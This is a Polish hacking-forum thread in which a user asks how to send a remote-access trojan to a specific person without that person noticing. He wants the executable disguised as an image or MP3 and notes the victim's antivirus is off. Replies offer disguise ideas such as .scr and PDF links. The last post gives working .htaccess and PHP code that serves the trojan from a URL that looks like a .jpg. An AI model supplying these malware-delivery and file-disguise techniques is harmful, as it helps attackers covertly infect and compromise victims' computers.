Pokaż wyniki 1 do 5 z 5

Temat: RAT - Metody wysyłania.

  1. #1
    Zarejestrowany
    Apr 2014
    Postów
    5

    Domyślnie RAT - Metody wysyłania.

    Witam, mam prostego trojana którego chciałbym podesłać pewnej osobie.

    Problem polega na tym, że nie wiem w jaki sposób go wysłać.

    osoba ta ma wyłączone pokazywanie rozszerzeń plików, więc mógłbym po prostu nazwać to zdjęcie.jpg , ale przy pobieraniu z hostingu ukazuje się prawdziwe rozszerzenie i wychodzi coś w stylu zdjęcie.jpg.exe.


    Macie jakieś metody na wysłanie? Na komputerze do którego chcę to wysłać jest mc afee, ale z tego co mi wiadomo jest ciągle wyłączony.


    Czy istnieje jakiś binder który dawałby plik wyjściowy w rozszerzeniu .jpg lub np. mp3 ?

    Np. Mam zbindowanego trojana z plikiem MP3, i nazywam to McHammer - Cant touch this.MP3 a nie .EXE
    Ostatnio edytowane przez Wachu5747 : 04-25-2014 - 11:22

  2. #2
    Zarejestrowany
    Dec 2011
    Skąd
    Mazury
    Postów
    133

    Domyślnie

    Nie da się wykonać pliku o niewykonywalnym rozszerzeniu.

    Gdzieś kiedyś czytałem, że da się zrobić taki patent z formatem pdf, bo rzekomo zawiera elementy wykonywalne ale nie mam pojęcia ile w tym prawdy. Więc niech się wypowiedzą na ten temat bardziej doświadczeni fachowcy.
    "Trąba powietrzna moich zepsutych myśli, zrywa ci z karku kołnierz ortopedyczny"

  3. #3
    Zarejestrowany
    Jan 2013
    Postów
    57

    Domyślnie

    A moze .scr

  4. #4
    Zarejestrowany
    Oct 2008
    Skąd
    woj. Lubuskie. Dokładniej się nie da
    Postów
    405

    Domyślnie

    co do pdfa, to ma interaktywne linki i załączniki - użytkownik może kliknąć więc link i coś brzydkiego uruchomić. Ale przed w normalnych programach pojawi się ostrzeżenie.
    Jeśli nie będziesz mieć pod górke, nigdy nie dojdziesz na szczyt.

  5. #5
    Zarejestrowany
    May 2014
    Postów
    9

    Domyślnie

    Zakładasz konto na byle jakim hostingu z PHP, wrzucasz tam trojana i tworzysz pliki:

    ".htaccess" o treści:
    Kod:
    AddType application/x-httpd-php .jpg
    "zdjecie.jpg" o treści:
    Kod php:
    <?php
    header
    ('Content-type: application/x-msdownload');
    header('Content-Disposition: attachment; filename="zdjecie.exe"');

    readfile('trojan.exe');
    ?>
    Zamiast trojan.exe wpisujesz nazwę pliku z trojanem (niektóre hostingi nie zezwalają na rozszerzenie .exe). Wchodzisz na http://[nazwa hostingu]/zdjecie.jpg i zamiast pliku zdjecie.jpg powinien ci się pobrać trojan, z rozszerzeniem exe. Jeśli nie, w .htaccess zamień AddType na AddHandler i spróbuj jeszcze raz =)

Zasady Postowania

  • Nie możesz zakładać nowych tematów
  • Nie możesz pisać wiadomości
  • Nie możesz dodawać załączników
  • Nie możesz edytować swoich postów
  •  
Subskrybuj